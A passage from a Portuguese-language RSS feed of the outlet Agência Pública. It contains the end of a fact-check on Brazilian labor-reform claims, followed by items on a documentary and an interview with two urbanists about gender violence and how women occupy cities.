salário mínimo fixado em lei e nacionalmente unificado é um direito de todos os trabalhadores, a nova CLT permite o pagamento de vencimentos inferiores ao salário mínimo para empregados no regime de trabalho intermitente. O contrato de trabalho intermitente, aquele que ocorre de modo esporádico, em dias alternados ou por apenas algumas horas, prevê remuneração por período trabalhado, e não mensal.</p><p>“Nesse caso, as condições da nova legislação são menos favoráveis para o trabalhador”, afirma Silva. “Não foi necessária uma alteração constitucional para criar uma situação mais vulnerável porque a regulamentação dos tipos de contrato consta na CLT, e não na Constituição.”</p><p>Barros destaca, no entanto, que muitos direitos não podem ser negociados. É o caso da licença maternidade e paternidade, da aposentadoria, do décimo terceiro salário e da indenização rescisória do Fundo de Garantia do Tempo de Serviço (FGTS). Esses e outros direitos estão listados no artigo 611-B da lei que institui a reforma trabalhista. Trata-se do trecho indicado pela assessoria de imprensa do ministro do Trabalho como fonte para a afirmação de Yomura.</p><p>O argumento de que os direitos trabalhistas estão previstos na Constituição e que, portanto, a aprovação da reforma trabalhista não interfere neles, é usado pela base governista há algum tempo. Em junho de 2017, o<a href="https://apublica.org/2017/06/truco-imprecisoes-cercam-argumentos-a-favor-da-reforma-trabalhista/"><strong> Truco</strong> verificou uma frase do senador petista Paulo Paim sobre o tema</a>. Na ocasião, Paim defendia que muitos direitos relevantes não estão documentados na Constituição, mas em outras leis ordinárias. A frase foi considerada verdadeira.</p><p>Segundo a advogada Fabiola Marques, professora de direito do trabalho na Pontifícia Universidade Católica de São Paulo (PUC-SP) consultada na verificação da afirmação de Paim, os direitos trabalhistas mais importantes estão na CLT e em algumas leis ordinárias. “O que a reforma está fazendo é justamente alterar esses direitos”, afirmou.</p><p>Ao ser comunicada sobre o selo, a assessoria de imprensa do ministro do Trabalho contestou o resultado: “Direitos basilares de proteção ao trabalhador estão previstos no artigo 7º da Constituição, passíveis de mudança apenas por emenda constitucional. O artigo e seus incisos garantem direitos como FGTS, 13º salário, férias, aviso prévio, descanso semanal remunerado, adicional de trabalho noturno, jornada máxima de trabalho de oito horas diárias e 44 semanais, hora extra com adicional de no mínimo 50% em relação à hora normal de trabalho, irredutibilidade de vencimentos, licenças maternidade e paternidade, aposentadoria, adicional por insalubridade, veto ao trabalho de menores de 16 anos, exceto na qualidade de aprendiz, a partir dos 14 anos, proibição de discriminação de salário ou critério de contratação de portadores de deficiências, proteção contra dispensa arbitrária ou sem justa causa, reconhecimento das convenções e acordos coletivos de trabalho, salário mínimo. O artigo 8º, por sua vez, garante a livre atividade sindical e associação sindical dos trabalhadores, sem a tutela do Estado, o artigo 9º assegura o direito de greve. Já o artigo 10º garante aos trabalhadores e empregadores a participação em colegiados de órgãos públicos em que são discutidas e deliberadas questões profissionais ou previdenciárias de interesse das categorias profissionais, e o 11º permite a eleição de um representante dos trabalhadores nas empresas com mais de 200 funcionários.”</p><hr /><p><strong><a id="checagem4"></a>“A reforma [trabalhista] de Temer já está produzindo efeitos. O emprego está cada vez mais precário, com menos carteira assinada e mais autônomos e contratos intermitentes.” – Ângela Portela (PDT-RR), senadora.</strong></p><p><img class="alignleft" src="https://apublica.org/wp-content/uploads/2017/06/impossivel-provar-400.jpg" alt="Impossível provar" width="400" height="400" /></p><p>Os dados disponíveis hoje não mostram os efeitos da reforma trabalhista. Como as mudanças entraram em meio a uma situação de crise econômica e estão em vigor desde 11 de novembro – ou seja, são ainda recentes –, não há indicações estatísticas que permitam separar o que foi causado pela retração e o que está relacionado à mudança na lei. Isso ocorre tanto com os números mais recentes do Cadastro Geral de Empregados e Desempregados (Caged), do Ministério do Trabalho, como com os da Pesquisa Nacional por Amostra de Domicílios (Pnad) Contínua, do Instituto Brasileiro de Geografia e Estatística (IBGE). A afirmação de Ângela Portela (PDT-RR) é impossível de provar.</p><p>A parlamentar citou como fonte da afirmação de que há menos vagas com carteira assinada<a href="https://economia.uol.com.br/empregos-e-carreiras/noticias/redacao/2018/04/27/brasil-tem-menor-numero-de-trabalhadores-com-carteira-assinada-em-6-anos.htm"> uma reportagem que cita dados da Pnad Contínua</a>. De acordo com o levantamento do IBGE, existiam<a href="https://agenciadenoticias.ibge.gov.br/agencia-sala-de-imprensa/2013-agencia-de-noticias/releases/20994-pnad-continua-taxa-de-desocupacao-e-de-13-1-no-trimestre-encerrado-em-marco.html"> 32,9 milhões pessoas empregadas com carteira assinada no primeiro trimestre deste ano (janeiro-fevereiro-março)</a>. Em relação aos três últimos meses de 2017, o número caiu 1,2%, ou seja, houve uma redução de 408 mil vagas. Embora o dado seja verdadeiro, essa redução não pode ser atribuída à reforma trabalhista. “Existe um efeito de sazonalidade no início do ano. É comum o desemprego subir”, diz Cimar Azeredo, coordenador de Trabalho e Rendimento do IBGE. “Os indicadores da Pnad Contínua até agora divulgados não conseguem separar o que foi causado pela reforma trabalhista e o que foi provocado pela crise.”</p><p>Uma das maneiras de verificar o impacto da reforma, segundo Azeredo, seria analisar os números sobre trabalho intermitente, que foi formalizado com a última reforma. Ele é definido como a prestação de serviços não contínua, que pode acontecer com alternância de períodos determinados e independe do tipo de atividade do contratado e do empregador.</p><p>O acompanhamento do trabalho intermitente é feito por enquanto apenas pelo<a href="http://pdet.mte.gov.br/caged/caged-meses-anteriores"> Cadastro Geral de Empregados e Desempregados (Caged)</a> do Ministério do Trabalho – que levanta dados de admissões e demissões em empregos formais no Brasil. A pasta começou a coletar os números sobre essa modalidade<a href="http://pdet.mte.gov.br/caged/caged-meses-anteriores"> a partir de novembro, quando houve um saldo positivo de 3.067 contratos</a> registrados. Inicialmente, o saldo foi<a href="http://pdet.mte.gov.br/caged/caged-2017/caged-dezembro-2017"> de 2.574, em dezembro</a>, de<a href="http://pdet.mte.gov.br/caged/caged-2018/caged-janeiro-2018"> 2.461, em janeiro</a>, e de<a href="http://pdet.mte.gov.br/caged/caged-2018/caged-fevereiro-2018"> 2.091 vagas, em fevereiro</a>.<a href="http://pdet.mte.gov.br/caged/caged-2018/caged-marco-2018"> Já em março, o saldo ficou em 3.199 postos</a> e,<a href="http://pdet.mte.gov.br/caged/caged-2018/caged-abril-2018"> em abril, chegou a 3.601 vagas</a>. Ou seja, foram 16.993 vagas criadas desde novembro, o que representa apenas 0,04% do total de 38.205.000 postos de trabalho formais.</p><p>Também não é possível afirmar que houve um aumento de trabalhadores autônomos após a reforma trabalhista, já que houve uma estabilidade no contingente desta classe nos últimos dois trimestres analisados pela Pnad Contínua. A pesquisa identifica o total de trabalhadores por conta própria (indivíduos com empreendimento próprio, sem empregados remunerados).<a href="https://sidra.ibge.gov.br/tabela/4097#/n1/all/v/4090/p/last%203/c11913/96170,96171/l/v,p+c11913,t/resultado"> No trimestre de novembro-dezembro-janeiro, havia 23.182.000 trabalhadores nessa condição</a>. No período seguinte (fevereiro-março-abril), o número ficou em 23.025.000. Para a Pnad, essa diferença de 157 mil (0,7%) é considerada como estável.</p><p>A assessoria da senadora contestou o resultado da checagem ao ser informada da classificação: “No que se refere à reforma trabalhista, o que se diz é: ‘O emprego está cada vez mais precário, com menos carteira assinada e mais autônomos e contratos intermitentes’. Todos os levantamentos relativos a mercado de trabalho, inclusive – e especialmente – os oficiais, como o Caged, confirmam textualmente essa afirmação. É evidente, portanto, que até agora a reforma trabalhista não produziu efeitos que revertam esse quadro, como era seu objetivo. Lógica elementar. Sobre o que acontecerá no futuro, não existe bola de cristal e, então, aí sim é impossível provar.” Como a checagem mostrou, no entanto, os dados do IBGE ou do Caged não mostram se houve algum impacto causado pela reforma trabalhista.</p> ]]></content:encoded> <wfw:commentRss>https://apublica.org/2018/06/truco-oit-ainda-analisa-denuncia-sobre-reforma-trabalhista/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Sob constante ameaça</title><link>https://apublica.org/2018/06/video-sob-constante-ameaca/</link> <comments>https://apublica.org/2018/06/video-sob-constante-ameaca/#respond</comments> <pubDate>Mon, 25 Jun 2018 13:52:52 +0000</pubDate> <dc:creator><![CDATA[Andrea DiP]]></dc:creator> <category><![CDATA[Português]]></category> <category><![CDATA[cidade]]></category> <category><![CDATA[feminismo]]></category> <category><![CDATA[mulheres]]></category> <category><![CDATA[São Paulo]]></category><guid isPermaLink="false">http://apublica.org/?post_type=video&p=47734</guid> <description><![CDATA[Medo, afetividades e subjetividades na forma de ocupar a cidade sob o olhar das mulheres; para uma melhor experiência sensorial utilize fones de ouvido]]></description> <content:encoded><![CDATA[<p>Nas grandes cidades brasileiras, as mulheres não ocupam o espaço urbano da mesma forma que os homens, por medo da violência de gênero. Tendem a evitar lugares como becos, pontes e passarelas, pensam horários e roupas antes de sair de casa e fazem desvios em seus caminhos, enquanto essas não são preocupações masculinas. Este medo, assim como as afetividades e a subjetividade na forma de ocupar a cidade, dão a tônica ao documentário.</p><p>Foram gravadas entrevistas com mulheres cis, trans, homens trans, mulheres brancas, negras, migrantes, deficientes visuais e cadeirantes e uma pesquisa online com 2590 respostas trouxe dados impressionantes como o de que 89% das mulheres não anda em becos e 93% evita andar a noite pela cidade.</p><p>“Sob Constante Ameaça” cria um suspense contínuo – vivenciado pelas mulheres em suas rotinas reais e traduzido na fala de uma delas: “Uma das coisas que é muito comum, é eu não saber se vou voltar inteira pra casa”. O filme possui planos que podem ser vistos tanto na perspectiva das personagens quanto na de um possível agressor, colocando o expectador em um lugar de tensão.</p> ]]></content:encoded> <wfw:commentRss>https://apublica.org/2018/06/video-sob-constante-ameaca/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Mulheres e o direito à cidade</title><link>https://apublica.org/2018/06/mulheres-e-o-direito-a-cidade/</link> <comments>https://apublica.org/2018/06/mulheres-e-o-direito-a-cidade/#respond</comments> <pubDate>Mon, 25 Jun 2018 13:52:10 +0000</pubDate> <dc:creator><![CDATA[Redação]]></dc:creator> <category><![CDATA[Português]]></category> <category><![CDATA[Conversa Pública]]></category> <category><![CDATA[Escola Sem Partido]]></category> <category><![CDATA[gênero]]></category> <category><![CDATA[violência contra a mulher]]></category><guid isPermaLink="false">http://apublica.org/?p=48091</guid> <description><![CDATA[Entrevista tratou de como o medo de assédio e violência de gênero influencia a forma de ocupar a cidade]]></description> <content:encoded><![CDATA[<p>A entrevista aconteceu na Casa Pública, no lançamento do minidoc <a href="https://www.youtube.com/watch?v=TlzROTM5-4M" target="_blank" rel="noopener">“Sob Constante Ameaça”</a> e contou com as opiniões da urbanista e arquiteta Tainá de Paula e da fundadora do escritório coletivo de arquitetura “Terceira Margem”, Iazana Guizzo, com condução da repórter da Pública Andrea Dip.</p><p><strong>Andrea Dip – Vocês acham que a cidade tem catracas para as mulheres? E essas catracas são diferentes dependendo das interseccionalidades?</strong></p><p><strong>Tainá de Paula –</strong> Vou me apresentar. Sou a Tainá de Paula, arquiteta e urbanista. E, na verdade, eu debato essas assimetrias de gênero a partir das desigualdades sociais postas. A cidade acaba sendo um grande território de opressão de um modo geral – de classe, raça e gênero. Inclusive, uma mulher, provavelmente negra, fala desse racismo e do machismo que sofre em um off do filme [o minidoc “<a href="https://apublica.org/2018/06/sob-constante-ameaca/" target="_blank" rel="noopener">Sob Constante Ameaça</a>” exibido antes da conversa] e achei super interessante porque é exatamente isso. Uma mulher negra, de determinada faixa social e determinada idade tem a percepção da cidade de uma forma totalmente diferente que uma mulher branca de determinada classe social tem. Isso está posto, está colocado. E acho também que esse não pertencimento, essa catraca que nunca roda para as mulheres parte muito da não inserção das mulheres no próprio pensamento da cidade. Inicialmente, os primeiros planejadores, os primeiros construtores, os primeiros pensadores da cidade foram homens e, concretamente, elas foram pensadas a partir dessa lógica e dessa métrica. Se a gente for parar para pensar no Rio de Janeiro, mulheres ricas eram vistas no centro da cidade em determinadas ruas, onde elas poderiam comprar, Rua do Ouvidor e tal. Mas era da carruagem para casa, da casa para aquela rua e acabou. Quem trabalhava, quem exercia o comando e tinha livre circulação nessa cidade era o homem. E as mulheres negras pós-escravas, por exemplo, foram proibidas de circular “rebolativas”. Tem um decreto municipal que fala da forma como as mulheres negras rebolavam no centro do Rio de Janeiro, foram proibidas de andar “rebolativas”. Esse não pertencimento desse corpo feminino na sua plenitude, na sua forma completa de ser e estar, rebolando ou não, sendo força de trabalho ou não nessa cidade também criou a cultura desse não pertencimento. A mulher ter paridade nesse pensar urbano é fundamental para a gente definir outras formas de ser na cidade.</p><p><iframe width="500" height="281" src="https://www.youtube.com/embed/mgMQu6s86Y4?feature=oembed" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe></p><p><strong>Iazana Guizzo –</strong> Eu sou da Terceira Margem, também sou arquiteta e urbanista. A Terceira Margem é um coletivo e escritório de arquitetura que se propõe a fazer de um outro modo esse pensar, em uma lógica que a gente defende como feminina. Eu queria chamar atenção, indo de encontro ao que você está falando para a espacialidade dos lugares onde vocês apresentam o filme, e que vêm justamente dessas entrevistas que você faz no início, onde as mulheres já dão a dica de que não querem habitar, não conseguem habitar, melhor dizendo. Eu fiquei pensando aqui que esses espaços não são desenhados nem para os homens. São espaços desenhados para os carros, para uma cidade que precisa circular, onde a mercadoria precisa circular. Então, são espaços que não são nem pensados para as pessoas. Então, qual é a lógica ali? A lógica é de uma cidade funcionalista, onde à noite, então, não tem uso, é uma lógica do automóvel, é uma lógica do desenho que não pensa a cidade, pensa um edifício isolado. E isso, para mim, acho que revela alguma coisa que é o espaço como produção de subjetividade, a gente desenha uma cidade que produz corpos funcionais, automáticos, que não estão sensíveis a determinadas questões, e isso tudo também é masculino. Quando você traz a ideia de que é pior para a mulher negra, com certeza é pior para a mulher negra. É pior para a mulher negra pobre? Com certeza é pior para a mulher negra pobre. É opressivo para os homens, é opressivo mais ainda para as mulheres, é opressivo mais ainda para as mulheres negras, é opressivo mais ainda para as mulheres negras pobres.</p><p><strong>Andrea Dip – Sim, são essas interseccionalidades. Esses espaços são ruins inclusive para os homens, mas o homem, se deixar a carteira em casa, por exemplo, resolveu seu problema, que é o medo de ser assaltado. Se a gente estiver assim, do jeito que a gente está, sem nada no bolso, a gente vai ter medo de violência de gênero, que é outra coisa, é um outro medo. Daí gostaria de fazer outra pergunta: A gente faz essa discussão de que a cidade deveria ser mais pensada para as mulheres, um outro tipo de espaço, circulação, pensado uma outra maneira, mas esses espaços de confinamento são ameaçadores por conta da misoginia, por conta do social? Por exemplo, se a gente pensar esses mesmos espaços em outros lugares que talvez não tenham uma violência de gênero tão forte, será que eles são tão ameaçadores? De fato, a gente deveria repensar os espaços por conta da violência de gênero ou esses espaços são ameaçadores por causa dessa violência?</strong></p><p><strong>Tainá de Paula –</strong> Eu acho que são as duas coisas. A gente tem uma lógica misógina, um machismo estrutural, não debatido de forma suficiente na sociedade, e existe o que a gente chama de erro de projeto mesmo, deu errado. Uma coisa que me chamou a atenção [no filme] e que eu fiquei enlouquecida porque eu conheço uma empresa que faz exatamente aquele modelo de passarela de dois metros.</p><p><strong>Andrea Dip –</strong> <strong>Gaiola, aquele gaiolão [passarelas fechadas mostradas no filme].</strong></p><p><strong>Tainá de Paula –</strong> Gaiola. Na forma como a sociedade se estabelece hoje, aquilo é um grande separador urbano, um grande enclave urbano, você não vê a pessoa que passa. E isso automaticamente se torna, nesse cenário de incerteza de segurança, claro, um ponto de insegurança central no tecido urbano desse território. E para as mulheres, nessa lógica misógina, passa automaticamente a ser um ponto onde a violência sexual pode ser aplicada e pode ser realizada. A gente também não tem um protocolo de segurança pública pensado para as mulheres, a Guarda Municipal deveria ter protocolo de segurança específico para violência de gênero e não tem. As criança têm, antigamente se tinha a figura do Guarda Municipal anti-capacitista para os possíveis portadores de deficiência da cidade, tem a Guarda Municipal, parte dela voltada para o turista, mas não tem Guarda Municipal especializada em violência de gênero. Então, as mulheres também precisam refletir sobre esse apagamento da condição feminina, dos corpos femininos. Paralelo a isso, eu acho também que existe na cidade, um pouco até do que já falamos, essa concepção de que estruturalmente a cidade é de todos, e todos é muita coisa, e todos vira ninguém quando você não repensa o planejamento urbano para os vários segmentos sociais. Acho que o planejamento urbano e os estudos preliminares de projetos de urbanismo e de arquitetura não refletem no Brasil as dificuldades e deficiências dos locais. As cidades que a gente tem hoje são um reflexo do nosso não-debate. A gente investe em transportes públicos de massa que não transportam determinada classe social, a gente tem metrô, o VLT, quantos negros conseguem pagar transporte público no Brasil e no Rio de Janeiro, especificamente, que é um dos transportes mais caros e mais não-inteligentes? A plateia começa a rir e o riso é de nervoso! Do ponto de vista de segurança das mulheres, as estações de trem são recordistas no índice de estupro ou de assédio, porque a partir de determinado momento ou horário elas ficam totalmente escuras em um perímetro de 600 metros. São Paulo tem um estudo de planejamento super interessante sobre mobilidade incluindo as mulheres, e está provado que as mulheres andam muito mais a pé, porque levam seus filhos na escola, nos postos de saúde, e a cidade não está preparada para isso. Acho que não está no projeto, não está no planejamento porque existe uma lógica estrutural que é machista e que nega o debate. E se eu não tenho debate, eu não tenho o reflexo disso no projeto.</p><p><strong>Iazana Guizzo –</strong> Eu acho também que é uma combinação. Um fato que eu acho que é claro é: cidade vazia é cidade perigosa. Então, se a gente tem uma combinação social, machista, que leva à violência, se isso estiver vazio, vai ser perigoso.</p><p><strong>Andrea Dip – Ou com muitos homens, né? Porque as mulheres também falam isso, “eu não passo onde tem muito homem”.</strong></p><p><strong>Iazana Guizzo –</strong> Sim, já sou acuada, né? Então, esse desenho de cidade que é uma cidade que não tem gente, não tem circulação. Eu falo isso porque eu tive a oportunidade de fazer um doutorado-sanduíche na França e foi uma coisa que me chamou muito a atenção, que lá cidade vazia é cidade segura, mesmo em Paris. O meu corpo não aceitava isso porque eu já entrava em estado de alerta, exatamente isso que a gente viu no filme. Respondendo bem diretamente a sua pergunta: acho que, evidentemente, uma certa espacialidade tem a ver, mas combinada com um certo arranjo social, cultural de um território. Uma coisa é a gente ocupar a cidade que está aí, o que é quase como uma espécie de redução de danos à situação que a gente vive, que é de não poder ocupar essa cidade. Vamos dizer assim, uma cidade feita por um pensamento funcionalista, machista, autoritário, capitalista. O que é defender uma cidade das mulheres? O que é isso? O que seria um desenho produzido por uma outra lógica? Esse desafio, eu tenho pensado nele há um tempo, e me evoca muito a ideia de a gente pensar uma outra cosmovisão com isso. Quando o Eduardo Ribeiro de Castro vai falar de uma perspectiva ameríndia em relação a uma perspectiva eurocêntrica, e que ele vai dizer “O que é o rio? É uma entidade”. Nessas cidades em que a gente está vivendo são esgotos, começa por aí, como é que uma entidade vira esgoto? Porque eu acho que defender uma perspectiva feminina é defender uma perspectiva da terra. Das árvores, dos rios, de um certo modo de estar no mundo que não é um… o Eduardo vai falar isso em relação à perspectiva Yanomami, a diferença de enxergar a Terra como um ser vivo, que respira, em contraponto a um lugar de onde eu extraio materiais e deposito lixo tóxico.</p><p><strong>Andrea Dip – Vou aproveitar que você propõe isso e perguntar a mesma coisa para a Tainá: como seria uma cidade pensada para as mulheres?</strong></p><p><strong>Tainá de Paula –</strong> Em uma lógica utopista de cidade, que é tão importante para os urbanistas principalmente, a gente precisa fazer o exercício de ir na radicalidade do projeto para conseguir voltar no possível, e é um exercício que eu costumo fazer muito. Como lógica utopista de cidade, acho que a gente pode pensar cidades obviamente inclusivas e cidades que sejam, na sua gênese, fontes de transformações sociais, e que as pessoas consigam escolher, vivenciar e dividir as suas transformações, que isso seja um processo coletivo. Isso tem que ser feito de uma forma horizontal. Acho que o urbanismo africano vem ensinando muito isso, de como você usa matrizes culturais e matrizes sociais para pensar e refletir como eu ocupo esse território de uma forma que pode ser espontânea, em certa medida, mas que necessariamente escuta esse povo e essa forma de pensar e agir. Lá é muito comum a gente ter casas de parto junto com biblioteca, junto com escola, que é junto com unidade habitacional, esses espaços não podem ser tão pensados de forma funcional e distante. É fundamental ter uma cidade que não exclua isso, como é o caso das cidades brasileiras por exemplo, que investiu ao longo dos anos nessa lógica casa grande/senzala, e só substituiu para cidade satélite/centro altamente urbanizado e descaracterizado da sua potência original de subúrbio, cidades do interior, de cidade periurbana, que nos afasta de uma lógica de agricultura familiar, que nos afastou de uma lógica de tempo maior com a família. A gente precisa pensar em como essa nova urbanidade, essa nova forma de ocupação acabou nos distanciando do que é esse ser brasileiro, que é o sujeito que plantava mandioca no seu quintal em Quintino e agora não planta mais porque vendeu metade do lote ou criou-se um prédio no lugar daquele lote maravilhoso que ele tinha. E não só a classe média, mas os pobres tiveram muito impacto nessa mudança, nessa transformação da forma de moradia e como se alimenta, como vive, como se relaciona. A gente está no Rio de Janeiro, onde a Rocinha tem esse nome porque concretamente as pessoas tinham roçados nos seus lotes. Eu acredito muito nesse retorno não dessa imagem lúdica, perdida ou dessa caricatura desse viver brasileiro, mas em uma outra possibilidade, em outra forma de vida mais espaçada, que possibilite, por exemplo, crianças conseguirem ter acesso a ensino integral que funcione como um CEU, que permita um outro ritmo e outro acesso a várias culturas e a sua própria cultura, que permita que eu tenha hortas orgânicas internas nesse lote. Eu acredito que a estrutura urbana tem que ser injetada de lembretes e marcadores de uma vida possível. E a gente precisa começar a pensar esses espaços como potencial de transformação. E nessa estrutura capitalista do carro, que a Iazana colocou muito bem, que exclui homens, mulheres, crianças, todo mundo, a gente precisa criar os espaços de respiro que sejam verdes ou que sejam espaços coletivos.</p> <figure id="attachment_48104" aria-describedby="figcaption_attachment_48104" class="wp-caption alignnone" itemscope itemtype="http://schema.org/ImageObject"><div class="imageAndSource"><div class='inline-image-source image-source p-1 text-right'>Reprodução Youtube</div><img itemprop="contentURL" class="wp-image-48104 size-full" src="https://apublica.org/wp-content/uploads/2018/06/Print-1.jpg" alt="" width="800" height="450" /></div><figcaption id="figcaption_attachment_48104" class="wp-caption-text caption" itemprop="description">Andrea Dip, Iazana Guizzo e Tainá de Paula conversaram sobre como o o medo de assédio e violência de gênero influenciam a forma que as mulheres ocupam a cidade</figcaption></figure><p><strong>Andrea Dip – Voltando um pouco, como vocês acham que essa violência de gênero, com todas as suas interseccionalidades, se imprime nos nossos afetos, como ela se imprime na forma como a gente se relaciona com a cidade, de forma subjetiva?</strong></p><p><strong>Iazana Guizzo –</strong> Eu acho que o nosso corpo é produzido. Não há uma naturalidade, não somos naturais. Eu aposto em uma produção de subjetividade. Então todas as nossas práticas, os encontros ao longo da existência vão produzindo um certo modo de estar no mundo, uma certa maneira de sentir, de ver, de viver, de pensar, nada disso nasceu com a gente de fato. Há perspectivas que pensam isso, eu não penso, e a beleza de pensar assim é que a gente pode mudar, não há algo determinado, fechado em si. Então, nesse sentido, a produção do corpo da mulher é absolutamente tomada por machismo desde o início. se a gente começa a cavoucar, e acho que esse levante feminista está super forte, e a gente começa a conversar sobre isso, e a gente começa a pensar uma série de acordos tácitos que vão fazer com que nós mesmas nos causemos alguma espécie de repressão sem que isso precise ser dito. Você pega um relacionamento entre homem e mulher, por exemplo. Uma série de condutas que você toma sem ninguém ter te pedido para tomar, mas é adequado, é correto, é visto com bons olhos, é uma produção da sua família, é uma produção do bairro, é uma produção da novela, é uma produção do cinema, está em todo lugar. Como a gente vem disputando a cidade, quando você transgride algum desses acordos tácitos é que você percebe que ele é um acordo tácito. Nessa ocupação, nessa disputa pelo seu corpo, “meu corpo, minhas regras”, você vai, então, se defrontar com isso. Acho que a Tainá que sabe esses dados mas o Brasil é um dos países mais machistas do mundo, e a violência contra a mulher está muito longe de ser só de chegar às vias de fato, de chegar a ser estuprada, por exemplo. A violência está em não poder existir, não poder ocupar os lugares, ou quando pode ocupar, tem que ocupar na lógica masculina. Se eu sou arquiteta, eu sou arquiteta do concreto, eu uso roupas pretas, roupas específicas, sigo a linha de uma determinada arquitetura que garanta que as coisas reconheçam “ah, ela com certeza é arquiteta”. Mas vai você experimentar um modo singular de fazer as coisas. Porque eu acho que, quando a gente se coloca como minoria, e aí em um sentido deleuziano de se colocar contra o hegemônico, o menor é o que não está dado, é o que não é o modelo hegemônico, é o contra-hegemônico, só te resta a experimentação, e a experimentação vai sempre ser, de alguma maneira, desconfiada, errada. Dua mulheres andando na rua de mão dada, mulher saindo de maiô no Carnaval, que absurdo!</p><p><strong>Andrea Dip – Mulher andando sozinha à noite. Você só precisa estar ali, seu corpo ali à noite já é errado, já é estranho.</strong></p><p><strong>Iazana Guizzo –</strong> E aí o bonito é que a cada coisinha dessa que a gente faz, a gente disputa a cidade. É uma disputa, é uma resistência é é o instaurar de um outro modus operandi ali na cidade. Por isso que é tão importante esse levante, tão importante a gente se encontrar, tão importante a gente de fato instaurar outras práticas. A disputa pela bicicleta na cidade também tem a ver com isso, entre outras coisas.</p><p><strong>Pública – Vocês acham que esse medo é consequência de uma sociedade patriarcal, consequência de uma misoginia, no sentido de “por ser assim, estamos com medo” ou vocês acham que isso é uma ferramenta de dominação? Que isso não acontece por acaso e não é por acaso que a gente tem medo de andar na rua, que mandam a gente para casa, que não ocupamos os espaços que achamos que deveríamos ocupar. Vocês acham que isso é uma consequência dessa misoginia ou que isso é uma ferramenta de dominação de fato?</strong></p><p><strong>Tainá de Paula –</strong> De novo, acho que são as duas coisas, mas acho que esse modelo da dominação está diretamente ligado à opressão e à lógica machista de pensar esse corpo feminino. E aí, falando também do meu lugar de feminista marxista, e achando que a grande sacada do capitalismo é transformar o corpo da mulher em mercadoria em determinado ponto, em certa medida, seja ela passada através de um dote, seja ela sendo valorizada pela existência ou não de um hímen, seja ela sendo valorizada a partir de uma pele diáfana, pelas formas como ela se sociabiliza, se estão próximas de uma certa cultura eurocêntrica, e aí na lógica de aproximação de uma teoria branca, eurocêntrica, indo no gráfico, uma mulher negra pós-escrava, está na base dessa pirâmide de ranking entre mulheres, e a lógica de ranqueamento de corpos é uma lógica extremamente machista porque homens não passam por esse ranqueamento, na lógica capitalista todos estão em pé de igualdade, na lógica meritocrática, porque a gente sabe também que não existe esse igualdade entre os corpos de homens também. Algumas feministas colocam esse debate de que homens também passam por essa lógica patriarcal, esse marcador. Eu não chego a tanto, mas concordo que existe um debate a ser feito em relação ao corpo masculino também, e é um debate que eu faço por exemplo em relação aos corpos de homens negros, à luz do hiperencarceramento, genocídio da população e principalmente dos jovens negros. Mas voltando às mulheres, acho que esse isolamento das mulheres na categoria “mercadoria” fez com que, concretamente, isso fosse reproduzido na sociedade como objetificação. E aí, pegando esse objeto que ganha valor maior ou menor do ponto de vista financeiro, de potencial econômico que pode ser extraído naquela mercadoria, as mulheres se acostumaram consciente e inconscientemente a se tratar e se autorreferenciar na sociedade como objeto. Então a cultura da estética, a cultura do ranqueamento entre mulheres, isso tudo na verdade são subitens, sub-caixinhas nessa lógica capitalista de pensar os corpos. Eu sou uma feminista anticapitalista por essência, nosso gargalo central está aí. Por isso que em determinados momentos, quando eu vejo o feminismo caminhando para uma lógica muito liberal de pensar a individualidade, eu me incomodo muito. É claro que também não devemos perder de vista a garantia da identidade, e aí eu falo também do meu lugar de fala de mulher negra, vejo também que foi muito importante o feminismo negro pensar esses corpos individualmente e pensar a sua própria identidade. A gente precisa, no campo do mulherio preto, pensar nessa nova estética, que foi uma estética negada e que a gente tem que dar conta e dizer “não vamos questionar o tombamento da Karol Conká, deixa ela ser rica e poderosa porque é o que temos”. Se a gente for começar a criticar esse tipo de individualidade, a gente também precisa discutir antes por que é que essa individualidade foi negada, um pouco por aí. Por que é que esse corpo perdeu importância e agora ele exige uma importância, que é um pouco esse marcador que a gente precisa entender também. Mas acho que estamos em um momento, e eu tenho muita dificuldade de falar aqui “a culpa é da Primavera” porque as feministas históricas ficam uma arara comigo, mas a gente está em um momento que ainda é uma grande “ondona” da Primavera, a gente não pode deixar de falar sobre isso. A minha saída do armário está muito marcada na Primavera. Eu sempre fiz um namoro com o movimento de mulheres, principalmente as mulheres negras, mas é a partir da onda da Primavera que eu vejo, não só eu, mas várias outras mulheres se reivindicando mulheres feministas, no meu caso, mulheres feministas negras interseccionais. Acho que o clique é muito latente nessa época, e no Brasil não é diferente. E acho que a gente tem que surfar literalmente nessa onda para transformar esse novo comum, de a mulher não se entender, não querer se garantir como mercadoria.</p><p><strong>Maria Bia – Onde é que entra, na visão de vocês, o direito das pessoas em situação de rua? E, dentro desse quadro, o direito das mulheres e crianças que vivem em situação de rua?</strong></p><p><strong>Pablo –</strong> <strong>Tenho uma professora que veio da República Tcheca que fala que, ao vir para o Rio, teve que aprender a ter medo da cidade, que lá ela não tinha medo da cidade. Mas, ao mesmo tempo, trata-se de um país do Leste Europeu tremendamente conservador e com um problema sério de tráfico humano e violência doméstica, o que leva o Brasil a ter a peculiaridade do assédio na rua como uma coisa muito forte na questão da misoginia. A demonstração da misoginia se dá pelo assédio, enquanto outros não são necessariamente assim, mas também são conservadores.</strong></p><p><strong>Iazana Guizzo –</strong> Se a gente tivesse uma cidade mais democrática, uma cidade minimamente estruturada, a gente não teria tanto esse modo de morar que, por um lado, nas condições em que a gente está, vive muita opressão, todos nós convivemos com isso. É gritante o aumento da população de rua no rio. E demonstra muito que isso não é uma questão só de opção, mas também pode vir a ser. E aí, acho que é essa a sua pergunta, a possibilidade de dar diferença em qualquer radicalidade desde que ela não seja fascista, se não vira um relativismo fascista, que também é um perigo. Mas uma garantia de que é possível habitar a cidade de muitas maneiras, inclusive questionando a cidade, o que eu acho que também tem nesse modo de morar, e que não é de hoje. A Grécia Clássica tinha essas figuras já para questionar. E aí, esse debate entra como por exemplo outros debates que trazem um pouco isso, que é a luta antimanicomial, por exemplo, que vai dizer assim “nos interessam diversos modos de viver, não só porque ‘ah, que legal, a gente não vai prender as pessoas que são diferentes'”, o que seria o mínimo, mas porque esses modos de vida singulares nos interrogam, nos colocam questões, nos deslocam desses modos absolutamente automáticos de viver. Então a diferença nos interessa enquanto cidade, quanto mais diferença, mais produção de criação, de liberdade, de existência.</p><p><strong>Tainá de Paula –</strong> Acho exatamente isso, e acho que o Estado precisa ser, falando claramente, aparelhado para lidar com as diferenças e as multiplicidades. Se a gente pega estados liberais, e aí falando de Estados Unidos de novo, a população de rua norte-americana, tem um trabalho de assistência social muito 